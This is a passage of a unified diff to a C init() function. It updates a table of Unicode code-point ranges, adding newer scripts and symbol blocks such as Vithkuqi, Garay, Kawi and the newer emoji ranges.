-	while (c <= 0xa7ca)	// ..to LATIN SMALL LETTER S WITH SHORT STROKE OVERLAY
+	charset[i++] = 0xa7d0;	// LATIN CAPITAL LETTER CLOSED INSULAR G
+	charset[i++] = 0xa7d1;	// LATIN SMALL LETTER CLOSED INSULAR G
+	c = 0xa7d5;		// from LATIN SMALL LETTER DOUBLE WYNN
+	while (c <= 0xa7dc)	// ..to LATIN CAPITAL LETTER LAMBDA WITH STROKE
 		charset[i++] = c++;
-	c = 0xa7f5;		// from LATIN CAPITAL LETTER REVERSED HALF H
+	c = 0xa7f2;		// from MODIFIER LETTER CAPITAL C
 	while (c <= 0xa7ff)	// ..to LATIN EPIGRAPHIC LETTER ARCHAIC M
 		charset[i++] = c++;
 // A800..A82F; Syloti Nagri
@@ -1263,19 +1257,16 @@ void init()
 		charset[i++] = c++;
 // FB50..FDFF; Arabic Presentation Forms-A
 	c = 0xfb50;		// from ARABIC LETTER ALEF WASLA ISOLATED FORM
-	while (c <= 0xfbc1)	// ..to ARABIC SYMBOL SMALL TAH BELOW
+	while (c <= 0xfbc2)	// ..to ARABIC SYMBOL WASLA ABOVE
 		charset[i++] = c++;
 	c = 0xfbd3;		// from ARABIC LETTER NG ISOLATED FORM
-	while (c <= 0xfd3f)	// ..to ORNATE RIGHT PARENTHESIS
-		charset[i++] = c++;
-	c = 0xfd50;		// from ARABIC LIGATURE TEH WITH JEEM WITH MEEM INITIAL FORM
 	while (c <= 0xfd8f)	// ..to ARABIC LIGATURE MEEM WITH KHAH WITH MEEM INITIAL FORM
 		charset[i++] = c++;
 	c = 0xfd92;		// from ARABIC LIGATURE MEEM WITH JEEM WITH KHAH INITIAL FORM
 	while (c <= 0xfdc7)	// ..to ARABIC LIGATURE NOON WITH JEEM WITH YEH FINAL FORM
 		charset[i++] = c++;
 	c = 0xfdf0;		// from ARABIC LIGATURE SALLA USED AS KORANIC STOP SIGN ISOLATED FORM
-	while (c <= 0xfdfd)	// ..to ARABIC LIGATURE BISMILLAH AR-RAHMAN AR-RAHEEM
+	while (c <= 0xfdff)	// ..to ARABIC LIGATURE AZZA WA JALL
 		charset[i++] = c++;
 // FE00..FE0F; Variation Selectors
 	c = 0xfe00;		// from VARIATION SELECTOR-1
@@ -1448,6 +1439,33 @@ void init()
 	while (c <= 0x10563)	// ..to CAUCASIAN ALBANIAN LETTER KIW
 		charset[i++] = c++;
 	charset[i++] = 0x1056f;	// CAUCASIAN ALBANIAN CITATION MARK
+// 10570..105BF; Vithkuqi
+	c = 0x10570;		// from VITHKUQI CAPITAL LETTER A
+	while (c <= 0x1057a)	// ..to VITHKUQI CAPITAL LETTER GA
+		charset[i++] = c++;
+	c = 0x1057c;		// from VITHKUQI CAPITAL LETTER HA
+	while (c <= 0x1058a)	// ..to VITHKUQI CAPITAL LETTER RE
+		charset[i++] = c++;
+	c = 0x1058c;		// from VITHKUQI CAPITAL LETTER SE
+	while (c <= 0x10592)	// ..to VITHKUQI CAPITAL LETTER XE
+		charset[i++] = c++;
+	charset[i++] = 0x10594;	// VITHKUQI CAPITAL LETTER Y
+	charset[i++] = 0x10595;	// VITHKUQI CAPITAL LETTER ZE
+	c = 0x10597;		// from VITHKUQI SMALL LETTER A
+	while (c <= 0x105a1)	// ..to VITHKUQI SMALL LETTER GA
+		charset[i++] = c++;
+	c = 0x105a3;		// from VITHKUQI SMALL LETTER HA
+	while (c <= 0x105b1)	// ..to VITHKUQI SMALL LETTER RE
+		charset[i++] = c++;
+	c = 0x105b3;		// from VITHKUQI SMALL LETTER SE
+	while (c <= 0x105b9)	// ..to VITHKUQI SMALL LETTER XE
+		charset[i++] = c++;
+	charset[i++] = 0x105bb;	// VITHKUQI SMALL LETTER Y
+	charset[i++] = 0x105bc;	// VITHKUQI SMALL LETTER ZE
+// 105C0..105FF; Todhri
+	c = 0x105c0;		// from TODHRI LETTER A
+	while (c <= 0x105f3)	// ..to TODHRI LETTER OO
+		charset[i++] = c++;
 // 10600..1077F; Linear A
 	c = 0x10600;		// from LINEAR A SIGN AB001
 	while (c <= 0x10736)	// ..to LINEAR A SIGN A664
@@ -1458,6 +1476,16 @@ void init()
 	c = 0x10760;		// from LINEAR A SIGN A800
 	while (c <= 0x10767)	// ..to LINEAR A SIGN A807
 		charset[i++] = c++;
+// 10780..107BF; Latin Extended-F
+	c = 0x10780;		// from MODIFIER LETTER SMALL CAPITAL AA
+	while (c <= 0x10785)	// ..to MODIFIER LETTER SMALL B WITH HOOK
+		charset[i++] = c++;
+	c = 0x10787;		// from MODIFIER LETTER SMALL DZ DIGRAPH
+	while (c <= 0x107b0)	// ..to MODIFIER LETTER SMALL V WITH RIGHT HOOK
+		charset[i++] = c++;
+	c = 0x107b2;		// from MODIFIER LETTER SMALL CAPITAL Y
+	while (c <= 0x107ba)	// ..to MODIFIER LETTER SMALL S WITH CURL
+		charset[i++] = c++;
 // 10800..1083F; Cypriot Syllabary
 	c = 0x10800;		// from CYPRIOT SYLLABLE A
 	while (c <= 0x10805)	// ..to CYPRIOT SYLLABLE JA
@@ -1610,6 +1638,15 @@ void init()
 	c = 0x10d30;		// from HANIFI ROHINGYA DIGIT ZERO
 	while (c <= 0x10d39)	// ..to HANIFI ROHINGYA DIGIT NINE
 		charset[i++] = c++;
+// 10D40..10D8F; Garay
+	c = 0x10d40;		// from GARAY DIGIT ZERO
+	while (c <= 0x10d65)	// ..to GARAY CAPITAL LETTER OLD NA
+		charset[i++] = c++;
+	c = 0x10d69;		// from GARAY VOWEL SIGN E
+	while (c <= 0x10d85)	// ..to GARAY SMALL LETTER OLD NA
+		charset[i++] = c++;
+	charset[i++] = 0x10d8e;	// GARAY PLUS SIGN
+	charset[i++] = 0x10d8f;	// GARAY MINUS SIGN
 // 10E60..10E7F; Rumi Numeral Symbols
 	c = 0x10e60;		// from RUMI DIGIT ONE
 	while (c <= 0x10e7e)	// ..to RUMI FRACTION TWO THIRDS
@@ -1622,6 +1659,12 @@ void init()
 	charset[i++] = 0x10ead;	// YEZIDI HYPHENATION MARK
 	charset[i++] = 0x10eb0;	// YEZIDI LETTER LAM WITH DOT ABOVE
 	charset[i++] = 0x10eb1;	// YEZIDI LETTER YOT WITH CIRCUMFLEX ABOVE
+// 10EC0..10EFF; Arabic Extended-C
+	charset[i++] = 0x10ec2;	// ARABIC LETTER DAL WITH TWO DOTS VERTICALLY BELOW
+	charset[i++] = 0x10ec4;	// ARABIC LETTER KAF WITH TWO DOTS VERTICALLY BELOW
+	c = 0x10efc;		// from ARABIC COMBINING ALEF OVERLAY
+	while (c <= 0x10eff)	// ..to ARABIC SMALL LOW WORD MADDA
+		charset[i++] = c++;
 // 10F00..10F2F; Old Sogdian
 	c = 0x10f00;		// from OLD SOGDIAN LETTER ALEPH
 	while (c <= 0x10f27)	// ..to OLD SOGDIAN LIGATURE AYIN-DALETH
@@ -1630,6 +1673,10 @@ void init()
 	c = 0x10f30;		// from SOGDIAN LETTER ALEPH
 	while (c <= 0x10f59)	// ..to SOGDIAN PUNCTUATION HALF CIRCLE WITH DOT
 		charset[i++] = c++;
+// 10F70..10FAF; Old Uyghur
+	c = 0x10f70;		// from OLD UYGHUR LETTER ALEPH
+	while (c <= 0x10f89)	// ..to OLD UYGHUR PUNCTUATION FOUR DOTS
+		charset[i++] = c++;
 // 10FB0..10FDF; Chorasmian
 	c = 0x10fb0;		// from CHORASMIAN LETTER ALEPH
 	while (c <= 0x10fcb)	// ..to CHORASMIAN NUMBER ONE HUNDRED
@@ -1643,12 +1690,12 @@ void init()
 	while (c <= 0x1104d)	// ..to BRAHMI PUNCTUATION LOTUS
 		charset[i++] = c++;
 	c = 0x11052;		// from BRAHMI NUMBER ONE
-	while (c <= 0x1106f)	// ..to BRAHMI DIGIT NINE
+	while (c <= 0x11075)	// ..to BRAHMI LETTER OLD TAMIL LLA
 		charset[i++] = c++;
 	charset[i++] = 0x1107f;	// BRAHMI NUMBER JOINER
 // 11080..110CF; Kaithi
 	c = 0x11080;		// from KAITHI SIGN CANDRABINDU
-	while (c <= 0x110c1)	// ..to KAITHI DOUBLE DANDA
+	while (c <= 0x110c2)	// ..to KAITHI VOWEL SIGN VOCALIC R
 		charset[i++] = c++;
 	charset[i++] = 0x110cd;	// KAITHI NUMBER SIGN ABOVE
 // 110D0..110FF; Sora Sompeng
@@ -1682,7 +1729,7 @@ void init()
 	while (c <= 0x11211)	// ..to KHOJKI LETTER JJA
 		charset[i++] = c++;
 	c = 0x11213;		// from KHOJKI LETTER NYA
-	while (c <= 0x1123e)	// ..to KHOJKI SIGN SUKUN
+	while (c <= 0x11241)	// ..to KHOJKI VOWEL SIGN VOCALIC R
 		charset[i++] = c++;
 // 11280..112AF; Multani
 	c = 0x11280;		// from MULTANI LETTER A
@@ -1740,6 +1787,26 @@ void init()
 	c = 0x11370;		// from COMBINING GRANTHA LETTER A
 	while (c <= 0x11374)	// ..to COMBINING GRANTHA LETTER PA
 		charset[i++] = c++;
+// 11380..113FF; Tulu-Tigalari
+	c = 0x11380;		// from TULU-TIGALARI LETTER A
+	while (c <= 0x11389)	// ..to TULU-TIGALARI LETTER VOCALIC LL
+		charset[i++] = c++;
+	c = 0x11390;		// from TULU-TIGALARI LETTER OO
+	while (c <= 0x113b5)	// ..to TULU-TIGALARI LETTER LLLA
+		charset[i++] = c++;
+	c = 0x113b7;		// from TULU-TIGALARI SIGN AVAGRAHA
+	while (c <= 0x113c0)	// ..to TULU-TIGALARI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0x113c7;		// from TULU-TIGALARI VOWEL SIGN OO
+	while (c <= 0x113ca)	// ..to TULU-TIGALARI SIGN CANDRA ANUNASIKA
+		charset[i++] = c++;
+	c = 0x113cc;		// from TULU-TIGALARI SIGN ANUSVARA
+	while (c <= 0x113d5)	// ..to TULU-TIGALARI DOUBLE DANDA
+		charset[i++] = c++;
+	charset[i++] = 0x113d7;	// TULU-TIGALARI SIGN OM PUSHPIKA
+	charset[i++] = 0x113d8;	// TULU-TIGALARI SIGN SHRII PUSHPIKA
+	charset[i++] = 0x113e1;	// TULU-TIGALARI VEDIC TONE SVARITA
+	charset[i++] = 0x113e2;	// TULU-TIGALARI VEDIC TONE ANUDATTA
 // 11400..1147F; Newa
 	c = 0x11400;		// from NEWA LETTER A
 	while (c <= 0x1145b)	// ..to NEWA PLACEHOLDER MARK
@@ -1774,12 +1841,16 @@ void init()
 		charset[i++] = c++;
 // 11680..116CF; Takri
 	c = 0x11680;		// from TAKRI LETTER A
-	while (c <= 0x116b8)	// ..to TAKRI LETTER ARCHAIC KHA
+	while (c <= 0x116b9)	// ..to TAKRI ABBREVIATION SIGN
 		charset[i++] = c++;
 	c = 0x116c0;		// from TAKRI DIGIT ZERO
 	while (c <= 0x116c9)	// ..to TAKRI DIGIT NINE
 		charset[i++] = c++;
-// 11700..1173F; Ahom
+// 116D0..116FF; Myanmar Extended-C
+	c = 0x116d0;		// from MYANMAR PAO DIGIT ZERO
+	while (c <= 0x116e3)	// ..to MYANMAR EASTERN PWO KAREN DIGIT NINE
+		charset[i++] = c++;
+// 11700..1174F; Ahom
 	c = 0x11700;		// from AHOM LETTER KA
 	while (c <= 0x1171a)	// ..to AHOM LETTER ALTERNATE BA
 		charset[i++] = c++;
@@ -1787,7 +1858,7 @@ void init()
 	while (c <= 0x1172b)	// ..to AHOM SIGN KILLER
 		charset[i++] = c++;
 	c = 0x11730;		// from AHOM DIGIT ZERO
-	while (c <= 0x1173f)	// ..to AHOM SYMBOL VI
+	while (c <= 0x11746)	// ..to AHOM LETTER LLA
 		charset[i++] = c++;
 // 11800..1184F; Dogra
 	c = 0x11800;		// from DOGRA LETTER A
@@ -1836,10 +1907,25 @@ void init()
 	c = 0x11a50;		// from SOYOMBO LETTER A
 	while (c <= 0x11aa2)	// ..to SOYOMBO TERMINAL MARK-2
 		charset[i++] = c++;
+// 11AB0..11ABF; Unified Canadian Aboriginal Syllabics Extended-A
+	c = 0x11ab0;		// from CANADIAN SYLLABICS NATTILIK HI
+	while (c <= 0x11abf)	// ..to CANADIAN SYLLABICS SPA
+		charset[i++] = c++;
 // 11AC0..11AFF; Pau Cin Hau
 	c = 0x11ac0;		// from PAU CIN HAU LETTER PA
 	while (c <= 0x11af8)	// ..to PAU CIN HAU GLOTTAL STOP FINAL
 		charset[i++] = c++;
+// 11B00..11B5F; Devanagari Extended-A
+	c = 0x11b00;		// from DEVANAGARI HEAD MARK
+	while (c <= 0x11b09)	// ..to DEVANAGARI SIGN MINDU
+		charset[i++] = c++;
+// 11BC0..11BFF; Sunuwar
+	c = 0x11bc0;		// from SUNUWAR LETTER DEVI
+	while (c <= 0x11be1)	// ..to SUNUWAR SIGN PVO
+		charset[i++] = c++;
+	c = 0x11bf0;		// from SUNUWAR DIGIT ZERO
+	while (c <= 0x11bf9)	// ..to SUNUWAR DIGIT NINE
+		charset[i++] = c++;
 // 11C00..11C6F; Bhaiksuki
 	c = 0x11c00;		// from BHAIKSUKI LETTER A
 	while (c <= 0x11c08)	// ..to BHAIKSUKI LETTER VOCALIC L
@@ -1901,6 +1987,16 @@ void init()
 	c = 0x11ee0;		// from MAKASAR LETTER KA
 	while (c <= 0x11ef8)	// ..to MAKASAR END OF SECTION
 		charset[i++] = c++;
+// 11F00..11F5F; Kawi
+	c = 0x11f00;		// from KAWI SIGN CANDRABINDU
+	while (c <= 0x11f10)	// ..to KAWI LETTER O
+		charset[i++] = c++;
+	c = 0x11f12;		// from KAWI LETTER KA
+	while (c <= 0x11f3a)	// ..to KAWI VOWEL SIGN VOCALIC R
+		charset[i++] = c++;
+	c = 0x11f3e;		// from KAWI VOWEL SIGN E
+	while (c <= 0x11f5a)	// ..to KAWI SIGN NUKTA
+		charset[i++] = c++;
 // 11FB0..11FBF; Lisu Supplement
 	charset[i++] = 0x11fb0;	// LISU LETTER YHA
 // 11FC0..11FFF; Tamil Supplement
@@ -1923,18 +2019,30 @@ void init()
 	c = 0x12480;		// from CUNEIFORM SIGN AB TIMES NUN TENU
 	while (c <= 0x12543)	// ..to CUNEIFORM SIGN ZU5 TIMES THREE DISH TENU
 		charset[i++] = c++;
+// 12F90..12FFF; Cypro-Minoan
+	c = 0x12f90;		// from CYPRO-MINOAN SIGN CM001
+	while (c <= 0x12ff2)	// ..to CYPRO-MINOAN SIGN CM302
+		charset[i++] = c++;
 // 13000..1342F; Egyptian Hieroglyphs
 	c = 0x13000;		// from EGYPTIAN HIEROGLYPH A001
-	while (c <= 0x1342e)	// ..to EGYPTIAN HIEROGLYPH AA032
+	while (c <= 0x1342f)	// ..to EGYPTIAN HIEROGLYPH V011D
 		charset[i++] = c++;
-// 13430..1343F; Egyptian Hieroglyph Format Controls
+// 13430..1345F; Egyptian Hieroglyph Format Controls
 	c = 0x13430;		// from EGYPTIAN HIEROGLYPH VERTICAL JOINER
-	while (c <= 0x13438)	// ..to EGYPTIAN HIEROGLYPH END SEGMENT
+	while (c <= 0x13455)	// ..to EGYPTIAN HIEROGLYPH MODIFIER DAMAGED
+		charset[i++] = c++;
+// 13460..143FF; Egyptian Hieroglyphs Extended-A
+	c = 0x13460;		// from EGYPTIAN HIEROGLYPH-13460
+	while (c <= 0x143fa)	// ..to EGYPTIAN HIEROGLYPH-143FA
 		charset[i++] = c++;
 // 14400..1467F; Anatolian Hieroglyphs
 	c = 0x14400;		// from ANATOLIAN HIEROGLYPH A001
 	while (c <= 0x14646)	// ..to ANATOLIAN HIEROGLYPH A530
 		charset[i++] = c++;
+// 16100..1613F; Gurung Khema
+	c = 0x16100;		// from GURUNG KHEMA LETTER A
+	while (c <= 0x16139)	// ..to GURUNG KHEMA DIGIT NINE
+		charset[i++] = c++;
 // 16800..16A3F; Bamum Supplement
 	c = 0x16800;		// from BAMUM LETTER PHASE-A NGKUE MFON
 	while (c <= 0x16a38)	// ..to BAMUM LETTER PHASE-F VUEQ
@@ -1948,6 +2056,13 @@ void init()
 		charset[i++] = c++;
 	charset[i++] = 0x16a6e;	// MRO DANDA
 	charset[i++] = 0x16a6f;	// MRO DOUBLE DANDA
+// 16A70..16ACF; Tangsa
+	c = 0x16a70;		// from TANGSA LETTER OZ
+	while (c <= 0x16abe)	// ..to TANGSA LETTER ZA
+		charset[i++] = c++;
+	c = 0x16ac0;		// from TANGSA DIGIT ZERO
+	while (c <= 0x16ac9)	// ..to TANGSA DIGIT NINE
+		charset[i++] = c++;
 // 16AD0..16AFF; Bassa Vah
 	c = 0x16ad0;		// from BASSA VAH LETTER ENNI
 	while (c <= 0x16aed)	// ..to BASSA VAH LETTER I
@@ -1971,6 +2086,10 @@ void init()
 	c = 0x16b7d;		// from PAHAWH HMONG CLAN SIGN TSHEEJ
 	while (c <= 0x16b8f)	// ..to PAHAWH HMONG CLAN SIGN VWJ
 		charset[i++] = c++;
+// 16D40..16D7F; Kirat Rai
+	c = 0x16d40;		// from KIRAT RAI SIGN ANUSVARA
+	while (c <= 0x16d79)	// ..to KIRAT RAI DIGIT NINE
+		charset[i++] = c++;
 // 16E40..16E9F; Medefaidrin
 	c = 0x16e40;		// from MEDEFAIDRIN CAPITAL LETTER M
 	while (c <= 0x16e9a)	// ..to MEDEFAIDRIN EXCLAMATION OH
@@ -2003,17 +2122,27 @@ void init()
 	c = 0x18b00;		// from KHITAN SMALL SCRIPT CHARACTER-18B00
 	while (c <= 0x18cd5)	// ..to KHITAN SMALL SCRIPT CHARACTER-18CD5
 		charset[i++] = c++;
-// 18D00..18D8F; Tangut Supplement
+	charset[i++] = 0x18cff;	// KHITAN SMALL SCRIPT CHARACTER-18CFF
+// 18D00..18D7F; Tangut Supplement
 	c = 0x18d00;		// from <Tangut Ideograph Supplement, First>
 	while (c <= 0x18d08)	// ..to <Tangut Ideograph Supplement, Last>
 		charset[i++] = c++;
+// 1AFF0..1AFFF; Kana Extended-B
+	c = 0x1aff0;		// from KATAKANA LETTER MINNAN TONE-2
+	while (c <= 0x1aff3)	// ..to KATAKANA LETTER MINNAN TONE-5
+		charset[i++] = c++;
+	c = 0x1aff5;		// from KATAKANA LETTER MINNAN TONE-7
+	while (c <= 0x1affb)	// ..to KATAKANA LETTER MINNAN NASALIZED TONE-5
+		charset[i++] = c++;
+	charset[i++] = 0x1affd;	// KATAKANA LETTER MINNAN NASALIZED TONE-7
+	charset[i++] = 0x1affe;	// KATAKANA LETTER MINNAN NASALIZED TONE-8
 // 1B000..1B0FF; Kana Supplement
 	c = 0x1b000;		// from KATAKANA LETTER ARCHAIC E
 	while (c <= 0x1b0ff)	// ..to HENTAIGANA LETTER RE-2
 		charset[i++] = c++;
 // 1B100..1B12F; Kana Extended-A
 	c = 0x1b100;		// from HENTAIGANA LETTER RE-3
-	while (c <= 0x1b11e)	// ..to HENTAIGANA LETTER N-MU-MO-2
+	while (c <= 0x1b122)	// ..to KATAKANA LETTER ARCHAIC WU
 		charset[i++] = c++;
 // 1B130..1B16F; Small Kana Extension
 	charset[i++] = 0x1b150;	// HIRAGANA LETTER SMALL WI
@@ -2045,6 +2174,23 @@ void init()
 	c = 0x1bca0;		// from SHORTHAND FORMAT LETTER OVERLAP
 	while (c <= 0x1bca3)	// ..to SHORTHAND FORMAT UP STEP
 		charset[i++] = c++;
+// 1CC00..1CEBF; Symbols for Legacy Computing Supplement
+	c = 0x1cc00;		// from UP-POINTING GO-KART
+	while (c <= 0x1ccf9)	// ..to OUTLINED DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1cd00;		// from BLOCK OCTANT-3
+	while (c <= 0x1ceb3)	// ..to BLACK RIGHT TRIANGLE CARET
+		charset[i++] = c++;
+// 1CF00..1CFCF; Znamenny Musical Notation
+	c = 0x1cf00;		// from ZNAMENNY COMBINING MARK GORAZDO NIZKO S KRYZHEM ON LEFT
+	while (c <= 0x1cf2d)	// ..to ZNAMENNY COMBINING MARK KRYZH ON LEFT
+		charset[i++] = c++;
+	c = 0x1cf30;		// from ZNAMENNY COMBINING TONAL RANGE MARK MRACHNO
+	while (c <= 0x1cf46)	// ..to ZNAMENNY PRIZNAK MODIFIER ROG
+		charset[i++] = c++;
+	c = 0x1cf50;		// from ZNAMENNY NEUME KRYUK
+	while (c <= 0x1cfc3)	// ..to ZNAMENNY NEUME PAUK
+		charset[i++] = c++;
 // 1D000..1D0FF; Byzantine Musical Symbols
 	c = 0x1d000;		// from BYZANTINE MUSICAL SYMBOL PSILI
 	while (c <= 0x1d0f5)	// ..to BYZANTINE MUSICAL SYMBOL GORGON NEO KATO
@@ -2054,12 +2200,16 @@ void init()
 	while (c <= 0x1d126)	// ..to MUSICAL SYMBOL DRUM CLEF-2
 		charset[i++] = c++;
 	c = 0x1d129;		// from MUSICAL SYMBOL MULTIPLE MEASURE REST
-	while (c <= 0x1d1e8)	// ..to MUSICAL SYMBOL KIEVAN FLAT SIGN
+	while (c <= 0x1d1ea)	// ..to MUSICAL SYMBOL KORON
 		charset[i++] = c++;
 // 1D200..1D24F; Ancient Greek Musical Notation
 	c = 0x1d200;		// from GREEK VOCAL NOTATION SYMBOL-1
 	while (c <= 0x1d245)	// ..to GREEK MUSICAL LEIMMA
 		charset[i++] = c++;
+// 1D2C0..1D2DF; Kaktovik Numerals
+	c = 0x1d2c0;		// from KAKTOVIK NUMERAL ZERO
+	while (c <= 0x1d2d3)	// ..to KAKTOVIK NUMERAL NINETEEN
+		charset[i++] = c++;
 // 1D2E0..1D2FF; Mayan Numerals
 	c = 0x1d2e0;		// from MAYAN NUMERAL ZERO
 	while (c <= 0x1d2f3)	// ..to MAYAN NUMERAL NINETEEN
@@ -2135,6 +2285,13 @@ void init()
 	c = 0x1daa1;		// from SIGNWRITING ROTATION MODIFIER-2
 	while (c <= 0x1daaf)	// ..to SIGNWRITING ROTATION MODIFIER-16
 		charset[i++] = c++;
+// 1DF00..1DFFF; Latin Extended-G
+	c = 0x1df00;		// from LATIN SMALL LETTER FENG DIGRAPH WITH TRILL
+	while (c <= 0x1df1e)	// ..to LATIN SMALL LETTER S WITH CURL
+		charset[i++] = c++;
+	c = 0x1df25;		// from LATIN SMALL LETTER D WITH MID-HEIGHT LEFT HOOK
+	while (c <= 0x1df2a)	// ..to LATIN SMALL LETTER T WITH MID-HEIGHT LEFT HOOK
+		charset[i++] = c++;
 // 1E000..1E02F; Glagolitic Supplement
 	c = 0x1e000;		// from COMBINING GLAGOLITIC LETTER AZU
 	while (c <= 0x1e006)	// ..to COMBINING GLAGOLITIC LETTER ZHIVETE
@@ -2150,6 +2307,11 @@ void init()
 	c = 0x1e026;		// from COMBINING GLAGOLITIC LETTER YO
 	while (c <= 0x1e02a)	// ..to COMBINING GLAGOLITIC LETTER FITA
 		charset[i++] = c++;
+// 1E030..1E08F; Cyrillic Extended-D
+	c = 0x1e030;		// from MODIFIER LETTER CYRILLIC SMALL A
+	while (c <= 0x1e06d)	// ..to MODIFIER LETTER CYRILLIC SMALL STRAIGHT U WITH STROKE
+		charset[i++] = c++;
+	charset[i++] = 0x1e08f;	// COMBINING CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
 // 1E100..1E14F; Nyiakeng Puachue Hmong
 	c = 0x1e100;		// from NYIAKENG PUACHUE HMONG LETTER MA
 	while (c <= 0x1e12c)	// ..to NYIAKENG PUACHUE HMONG LETTER W
@@ -2162,11 +2324,36 @@ void init()
 		charset[i++] = c++;
 	charset[i++] = 0x1e14e;	// NYIAKENG PUACHUE HMONG LOGOGRAM NYAJ
 	charset[i++] = 0x1e14f;	// NYIAKENG PUACHUE HMONG CIRCLED CA
+// 1E290..1E2BF; Toto
+	c = 0x1e290;		// from TOTO LETTER PA
+	while (c <= 0x1e2ae)	// ..to TOTO SIGN RISING TONE
+		charset[i++] = c++;
 // 1E2C0..1E2FF; Wancho
 	c = 0x1e2c0;		// from WANCHO LETTER AA
 	while (c <= 0x1e2f9)	// ..to WANCHO DIGIT NINE
 		charset[i++] = c++;
 	charset[i++] = 0x1e2ff;	// WANCHO NGUN SIGN
+// 1E4D0..1E4FF; Nag Mundari
+	c = 0x1e4d0;		// from NAG MUNDARI LETTER O
+	while (c <= 0x1e4f9)	// ..to NAG MUNDARI DIGIT NINE
+		charset[i++] = c++;
+// 1E5D0..1E5FF; Ol Onal
+	c = 0x1e5d0;		// from OL ONAL LETTER O
+	while (c <= 0x1e5fa)	// ..to OL ONAL DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1e5ff;	// OL ONAL ABBREVIATION SIGN
+// 1E7E0..1E7FF; Ethiopic Extended-B
+	c = 0x1e7e0;		// from ETHIOPIC SYLLABLE HHYA
+	while (c <= 0x1e7e6)	// ..to ETHIOPIC SYLLABLE HHYO
+		charset[i++] = c++;
+	c = 0x1e7e8;		// from ETHIOPIC SYLLABLE GURAGE HHWA
+	while (c <= 0x1e7eb)	// ..to ETHIOPIC SYLLABLE HHWE
+		charset[i++] = c++;
+	charset[i++] = 0x1e7ed;	// ETHIOPIC SYLLABLE GURAGE MWI
+	charset[i++] = 0x1e7ee;	// ETHIOPIC SYLLABLE GURAGE MWEE
+	c = 0x1e7f0;		// from ETHIOPIC SYLLABLE GURAGE QWI
+	while (c <= 0x1e7fe)	// ..to ETHIOPIC SYLLABLE GURAGE PWEE
+		charset[i++] = c++;
 // 1E800..1E8DF; Mende Kikakui
 	c = 0x1e800;		// from MENDE KIKAKUI SYLLABLE M001 KI
 	while (c <= 0x1e8c4)	// ..to MENDE KIKAKUI SYLLABLE M060 NYON
@@ -2298,7 +2485,7 @@ void init()
 	c = 0x1f680;		// from ROCKET
 	while (c <= 0x1f6d7)	// ..to ELEVATOR
 		charset[i++] = c++;
-	c = 0x1f6e0;		// from HAMMER AND WRENCH
+	c = 0x1f6dc;		// from WIRELESS
 	while (c <= 0x1f6ec)	// ..to AIRPLANE ARRIVING
 		charset[i++] = c++;
 	c = 0x1f6f0;		// from SATELLITE
@@ -2306,15 +2493,19 @@ void init()
 		charset[i++] = c++;
 // 1F700..1F77F; Alchemical Symbols
 	c = 0x1f700;		// from ALCHEMICAL SYMBOL FOR QUINTESSENCE
-	while (c <= 0x1f773)	// ..to ALCHEMICAL SYMBOL FOR HALF OUNCE
+	while (c <= 0x1f776)	// ..to LUNAR ECLIPSE
+		charset[i++] = c++;
+	c = 0x1f77b;		// from HAUMEA
+	while (c <= 0x1f77f)	// ..to ORCUS
 		charset[i++] = c++;
 // 1F780..1F7FF; Geometric Shapes Extended
 	c = 0x1f780;		// from BLACK LEFT-POINTING ISOSCELES RIGHT TRIANGLE
-	while (c <= 0x1f7d8)	// ..to NEGATIVE CIRCLED SQUARE
+	while (c <= 0x1f7d9)	// ..to NINE POINTED WHITE STAR
 		charset[i++] = c++;
 	c = 0x1f7e0;		// from LARGE ORANGE CIRCLE
 	while (c <= 0x1f7eb)	// ..to LARGE BROWN SQUARE
 		charset[i++] = c++;
+	charset[i++] = 0x1f7f0;	// HEAVY EQUALS SIGN
 // 1F800..1F8FF; Supplemental Arrows-C
 	c = 0x1f800;		// from LEFTWARDS ARROW WITH SMALL TRIANGLE ARROWHEAD
 	while (c <= 0x1f80b)	// ..to DOWNWARDS ARROW WITH LARGE TRIANGLE ARROWHEAD
@@ -2331,16 +2522,13 @@ void init()
 	c = 0x1f890;		// from LEFTWARDS TRIANGLE ARROWHEAD
 	while (c <= 0x1f8ad)	// ..to WHITE ARROW SHAFT WIDTH TWO THIRDS
 		charset[i++] = c++;
-	charset[i++] = 0x1f8b0;	// ARROW POINTING UPWARDS THEN NORTH WEST
-	charset[i++] = 0x1f8b1;	// ARROW POINTING RIGHTWARDS THEN CURVING SOUTH WEST
+	c = 0x1f8b0;		// from ARROW POINTING UPWARDS THEN NORTH WEST
+	while (c <= 0x1f8bb)	// ..to SOUTH WEST ARROW FROM BAR
+		charset[i++] = c++;
+	charset[i++] = 0x1f8c0;	// LEFTWARDS ARROW FROM DOWNWARDS ARROW
+	charset[i++] = 0x1f8c1;	// RIGHTWARDS ARROW FROM DOWNWARDS ARROW
 // 1F900..1F9FF; Supplemental Symbols and Pictographs
 	c = 0x1f900;		// from CIRCLED CROSS FORMEE WITH FOUR DOTS
-	while (c <= 0x1f978)	// ..to DISGUISED FACE
-		charset[i++] = c++;
-	c = 0x1f97a;		// from FACE WITH PLEADING EYES
-	while (c <= 0x1f9cb)	// ..to BUBBLE TEA
-		charset[i++] = c++;
-	c = 0x1f9cd;		// from STANDING PERSON
 	while (c <= 0x1f9ff)	// ..to NAZAR AMULET
 		charset[i++] = c++;
 // 1FA00..1FA6F; Chess Symbols
@@ -2352,41 +2540,37 @@ void init()
 		charset[i++] = c++;
 // 1FA70..1FAFF; Symbols and Pictographs Extended-A
 	c = 0x1fa70;		// from BALLET SHOES
-	while (c <= 0x1fa74)	// ..to THONG SANDAL
+	while (c <= 0x1fa7c)	// ..to CRUTCH
 		charset[i++] = c++;
-	charset[i++] = 0x1fa78;	// DROP OF BLOOD
-	charset[i++] = 0x1fa7a;	// STETHOSCOPE
 	c = 0x1fa80;		// from YO-YO
-	while (c <= 0x1fa86)	// ..to NESTING DOLLS
+	while (c <= 0x1fa89)	// ..to HARP
 		charset[i++] = c++;
-	c = 0x1fa90;		// from RINGED PLANET
-	while (c <= 0x1faa8)	// ..to ROCK
+	c = 0x1fa8f;		// from SHOVEL
+	while (c <= 0x1fac6)	// ..to FINGERPRINT
 		charset[i++] = c++;
-	c = 0x1fab0;		// from FLY
-	while (c <= 0x1fab6)	// ..to FEATHER
+	c = 0x1face;		// from MOOSE
+	while (c <= 0x1fadc)	// ..to ROOT VEGETABLE
 		charset[i++] = c++;
-	charset[i++] = 0x1fac0;	// ANATOMICAL HEART
-	charset[i++] = 0x1fac2;	// PEOPLE HUGGING
-	c = 0x1fad0;		// from BLUEBERRIES
